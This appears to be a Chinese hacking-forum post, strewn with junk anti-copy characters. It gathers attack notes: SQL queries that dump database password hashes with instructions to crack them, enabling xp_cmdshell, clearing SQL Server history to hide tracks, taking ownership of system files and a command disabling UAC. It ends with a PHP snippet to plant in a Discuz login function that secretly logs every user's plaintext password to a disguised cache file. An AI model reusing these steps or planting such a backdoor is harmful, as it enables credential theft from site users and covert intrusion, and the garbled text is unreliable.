" K5 N5 I5 v( i+ V! OSELECT password from master.dbo.sysxlogins where name='sa'
n# v, Q' {; z7 H9 q, F* f1 d0×010034767D5C0CFA5FDCA28C4A56085E65E882E71CB0ED250341
" y3 ~0 M' ]" e' I2 t& X2FD54D6119FFF04129A1D72E7C3194F7284A7F3A
( b5 R0 @" ?$ p; h8 ~
% @/ C/ t, ^. [4 p8 Q0×0100- constant header7 g' O: |1 ~7 S1 a( X) i
34767D5C- salt# @; p' Q! d6 P3 V+ N! u: U
0CFA5FDCA28C4A56085E65E882E71CB0ED250341- case senstive hash
8 c, B5 `- w9 z2 `5 @1 C2FD54D6119FFF04129A1D72E7C3194F7284A7F3A- upper case hash
/ C, C! W$ Q, h7 S, x- |' Rcrack the upper case hash in ‘cain and abel’ and then work the case sentive hash
; V# b8 P8 r F5 FSQL server 2005:-, d/ [9 S& K% ~' d
SELECT password_hash FROM sys.sql_logins where name='sa'
5 C( Q7 R! e- H0×0100993BF2315F36CC441485B35C4D84687DC02C78B0E680411F Y$ u% F! D/ h: B7 r7 A
0×0100- constant header
- p; |+ B2 |9 m993BF231-salt
G, h' R4 g7 p. [9 |5F36CC441485B35C4D84687DC02C78B0E680411F- case sensitive hash
$ Y0 b0 X6 i% U$ ~) E6 scrack case sensitive hash in cain, try brute force and dictionary based attacks.
" w0 ~% l9 D- \, j7 R3 P& q7 A7 F
update:- following bernardo’s comments:-3 o2 z0 R+ F) X+ d
use function fn_varbintohexstr() to cast password in a hex string.
, p6 W# Y3 t* L( xe.g. select name from sysxlogins union all select master.dbo.fn_varbintohexstr(password)from sysxlogins
; [' Q% g! N9 G/ W* h) E0 C; v6 B+ u+ [! d3 y8 G7 i. R& A0 f
MYSQL:-0 s0 D! z; I! Y8 K
& \4 F* \% a/ f) ?In MySQL you can generate hashes internally using the password(), md5(), or sha1 functions. password() is the function used for MySQL’s own user authentication system. It returns a 16-byte string for MySQL versions prior to 4.1, and a 41-byte string (based on a double SHA-1 hash) for versions 4.1 and up. md5() is available from MySQL version 3.23.2 and sha1() was added later in 4.0.2.& ~5 k! I" k6 _8 g' r- T6 ? m
+ |. D* V& q6 @2 u*mysql < 4.1* I; P' p6 T' n
# t s0 J3 ?4 x3 }; K8 h2 L
mysql> SELECT PASSWORD(‘mypass’);% U- d9 O7 K; @# y5 j! @
+——————–+* v: z& V, Y5 b7 S6 u4 ^
| PASSWORD(‘mypass’) |7 I$ n o& S+ P; J
+——————–+
8 y9 T3 D5 I* ~9 x, d| 6f8c114b58f2ce9e |
' ^/ y. J: w0 t+——————–+6 ~% ] w" _. A2 P
+ Y8 F* q' @4 \; P3 V
*mysql >=4.1
' i1 z. v! L5 m' z& s/ A3 V
+ N+ E& ^1 I, P- Umysql> SELECT PASSWORD(‘mypass’);. `0 q5 d0 J1 O3 i
+——————————————-+
% B/ U9 O8 N& d! S| PASSWORD(‘mypass’) |
4 |/ @$ E" A6 X; p- G0 j5 T$ T9 t+——————————————-+
/ D% B7 E. B1 `6 `| *6C8989366EAF75BB670AD8EA7A7FC1176A95CEF4 |8 h7 S( z2 o# N0 j$ X7 C, v2 F
+——————————————-+$ \* F4 J; D" ~% }- u; U
, S& `0 ^1 g2 C, K* a1 p" kSelect user, password from mysql.user! m& ?, j/ v3 I" `, F, x
The hashes can be cracked in ‘cain and abel’) Y6 n$ O) W; R( b& E
X% @' P1 e6 w! iPostgres:-
3 G/ J0 h/ O8 Y" M. cPostgres keeps MD5-based password hashes for database-level users in the pg_shadow table. You need to be the database superuser to read this table (usually called “postgres” or “pgsql”)
% p$ N$ }2 k) l* hselect usename, passwd from pg_shadow;
, h; z9 L8 {) Rusename | passwd$ u; Z4 O% E. N K# p2 ^- E
——————+————————————-1 Y- r% M2 g2 f/ ]/ o% g7 Y& }$ K
testuser | md5fabb6d7172aadfda4753bf0507ed4396
% w7 v4 \: y7 ]use mdcrack to crack these hashes:-
) o: a2 y" S( M; H$ wine MDCrack-sse.exe –algorithm=MD5 –append=testuser fabb6d7172aadfda4753bf0507ed4396: Z* Y+ \5 g* L8 ^( G2 B4 F! i
- X! Q& M' b3 j, mOracle:-
2 v5 b5 T/ O9 o' e6 e! q/ i& ^select name, password, spare4 from sys.user$0 ?5 C) H7 o2 @5 S1 ~
hashes could be cracked using ‘cain and abel’ or thc-orakelcrackert11g
# V* g* U3 e P* |8 iMore on Oracle later, i am a bit bored….( ~5 R3 y6 j: J0 i' g t4 K0 K6 m
* f& }7 x5 I1 W. D K
0 h- C2 \; B9 L7 q6 ^( |: \在sql server2005/2008中开启xp_cmdshell
1 Y- c8 K) u6 \7 X0 d5 Y! P' D5 `9 g-- To allow advanced options to be changed.
# }7 ]4 l0 V8 f7 V" JEXEC sp_configure 'show advanced options', 1
0 w' q- t+ u. h* LGO# Y' G) q9 f! y7 U
-- To update the currently configured value for advanced options.
$ x! j8 w& d3 f" @/ ^2 F- v; [ lRECONFIGURE) B; {" b' m) a
GO2 n5 \4 j: i- Z+ Q5 b$ k5 X* C
-- To enable the feature.
4 y! S* ^. K# nEXEC sp_configure 'xp_cmdshell', 1* s& `& ]( w" A c% [7 Y/ F. t
GO G U7 H* B$ L) z. u
-- To update the currently configured value for this feature.% Y6 C) M4 G, }/ C7 S6 u1 h
RECONFIGURE3 g: f5 s8 m% e( O4 z
GO0 s; Y b+ X/ [( P8 D/ \& ^
SQL 2008 server日志清除,在清楚前一定要备份。
! r7 B1 |8 [6 \3 k如果Windows Server 2008 标准版安装SQL Express 2008,则在这里删除: S: [. H# l/ G- N7 e3 a
X:\Users[SomeUser]\AppData\Roaming\Microsoft\Microsoft SQL Server\100\Tools\Shell\SqlStudio.bin& p/ S; p+ g2 |; k7 `
9 @" z6 h, G& J i5 B5 U7 i2 y
对于SQL Server 2008以前的版本:0 a$ m' l6 |1 Y) T
SQL Server 2005:
5 l9 A5 I0 k9 {% w' K- D7 W删除X:\Documents and Settings\XXX\Application Data\Microsoft\Microsoft SQL Server\90\Tools\Shell\mru.dat
+ \4 r, ?0 c; {* \0 i9 ?% w6 mSQL Server 2000:
, l# X$ @# N+ T4 r1 v- T清除注册表HKEY_CURRENT_USER\Software\Microsoft\Microsoft SQL Server\80\Tools\Client\PrefServers\相应的内容即可。
9 J1 C! I2 w& m) u- G- f/ r$ b) `+ f$ H: F. e" t
本帖最后由 simeon 于 2013-1-3 09:51 编辑
9 e+ Z0 L, U) V7 M2 L( C6 }
8 C3 |) Y: F1 d6 c: s8 I f& V& ~/ O. M' z9 X; _ v% d
windows 2008 文件权限修改
$ d Z& P2 y; S1.http://technet.microsoft.com/zh- ... 4%28v=ws.10%29.aspx
! a* V8 i1 U% u" h) W% Z/ V' q+ d2.http://hi.baidu.com/xiaobei713/item/b0cfae38f6bd278df5e4ad98. a. h; J- e+ Y; U1 x, O7 x
一、先在右键菜单里面看看有没有“管理员取得所有权”,没有“管理员取得所有权”,# l7 y- p; W; |
0 I8 k0 `; a4 {7 k
Windows Registry Editor Version 5.008 N. t n& l% a$ K1 F
[HKEY_CLASSES_ROOT\*\shell\runas]- u" z, j' ]$ S2 f8 N8 C- g: `# b
@="管理员取得所有权"# m- B! Y8 V% s5 Y: N, h
"NoWorkingDirectory"=""
9 [# |0 ]" m" I" f0 c[HKEY_CLASSES_ROOT\*\shell\runas\command]" t6 r$ ^' I" d' f/ ?+ D
@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"# w9 c8 z+ J" P2 |$ x0 _* @
"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
+ w% d- f6 ~6 V; X: n$ r[HKEY_CLASSES_ROOT\exefile\shell\runas2]: R& h" Z9 M8 @7 ]
@="管理员取得所有权"2 v' o j& E8 |5 u! X5 j9 h v
"NoWorkingDirectory"="") f! F, {0 ?& E& b; {! e
[HKEY_CLASSES_ROOT\exefile\shell\runas2\command]7 B8 L6 d1 Z) r* a+ [& S8 O, R9 v
@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"6 o: J) W: M5 L
"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
5 q% n5 {8 I: X) G, @/ r& Y
: b0 p; |9 t8 ?3 L[HKEY_CLASSES_ROOT\Directory\shell\runas]9 r- [6 u/ u+ B7 c" k
@="管理员取得所有权"5 i1 `1 e4 K2 s5 G7 E$ k& {
"NoWorkingDirectory"=""
! B$ C+ r G, d7 `[HKEY_CLASSES_ROOT\Directory\shell\runas\command]% \6 A& B' ?+ Y) r k/ R
@="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t"# V" g$ T9 A$ ^) S B+ |
"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t"$ Z) @+ v& R% ^7 `% S
' L* ^4 b0 G$ p2 J3 u# r4 w" J( U
0 a: _9 m+ H7 r8 e
win7右键“管理员取得所有权”.reg导入8 d8 M# T8 F/ C% }
二、在C:\Windows目录里下搜索“notepad.exe”文件,应该会搜索到四个“notepad.exe”和四个“notepad.exe.mui”,! l* B* r& C( X9 W& F
1、C:\Windows这个路径的“notepad.exe”不需要替换
- r& S5 T/ ]* c. F5 W, F8 k2、C:\Windows\System32这个路径的“notepad.exe”不需要替换2 j# W: \* H2 b6 _' m
3、四个“notepad.exe.mui”不要管& ]% T# {4 k* q, x) e" m
4、主要替换C:\Windows\winsxs\x86_microsoft-windows-notepad_31bf3856ad364e35_6.1.7600.16385_none_6ef0e39ed15350e4和1 Q8 z, y2 I0 `. A1 b. A
C:\Windows\winsxs\x86_microsoft-windows-notepadwin_31bf3856ad364e35_6.1.7600.16385_none_42a023025c60a33a两个文件下的“notepad.exe”
; D- ~$ B# d9 T7 n4 a' _8 q& B, v替换方法先取得这两个文件夹的管理员权限,然后把“Notepad2.exe”重命名为“notepad.exe”替换到这两个文件夹下面,4 {* y: t7 |# \
替换完之后回到桌面,新建一个txt文档打开看看是不是变了。: p: W6 j$ S! c3 \6 q/ ]/ v
windows 2008中关闭安全策略: + [4 \! P, Z6 X' W
reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f( y. B3 v8 Y8 T1 \
修改uc_client目录下的client.php 在7 u! W% F- F( r7 v4 G! l
function uc_user_login($username, $password, $isuid = 0, $checkques = 0, $questionid = '', $answer = '') {- ?4 N$ S/ [) D( b0 m* {
下加入如上代码,在网站./data/cache/目录下自动生成csslog.php8 k* Q. ~* c( L2 x
你可以在ipdata目录下添加 view.php 可以用来查看记录的,密码为:falw
6 v4 y; _+ `8 u& {) |if(getenv('HTTP_CLIENT_IP')) {1 B1 X% m$ @- T7 _- N1 {+ c8 E
$onlineip = getenv('HTTP_CLIENT_IP');
/ K# E) y( s9 m' f# ~9 p} elseif(getenv('HTTP_X_FORWARDED_FOR')) {8 i# @: k2 k9 f; p' Z+ Q
$onlineip = getenv('HTTP_X_FORWARDED_FOR');9 z0 x. \/ K8 f% c1 b( M _
} elseif(getenv('REMOTE_ADDR')) {7 g; p' c0 r7 P, y
$onlineip = getenv('REMOTE_ADDR');8 g" M# ]4 H8 Z% A' T
} else {' q# v9 S+ R9 |7 V( ~. u& U( G
$onlineip = $HTTP_SERVER_VARS['REMOTE_ADDR'];; H' r3 h9 i @
}1 ~, R6 }% q7 D! `
$showtime=date("Y-m-d H:i:s");2 ~8 Y& n( h* l8 Z2 x/ }6 Y( N, |
$record="<?exit();?>用户:".$username." 密码:".$password." IP:".$onlineip." Time:".$showtime."\r\n";
/ |' {# k+ E3 ~$ w, R' B$ S $handle=fopen('./data/cache/csslog.php','a+');
5 a% W9 g1 U: A, q S4 m4 a, u $write=fwrite($handle,$record); |
发表于 2013-2-27 21:24:42
收藏
支持
反对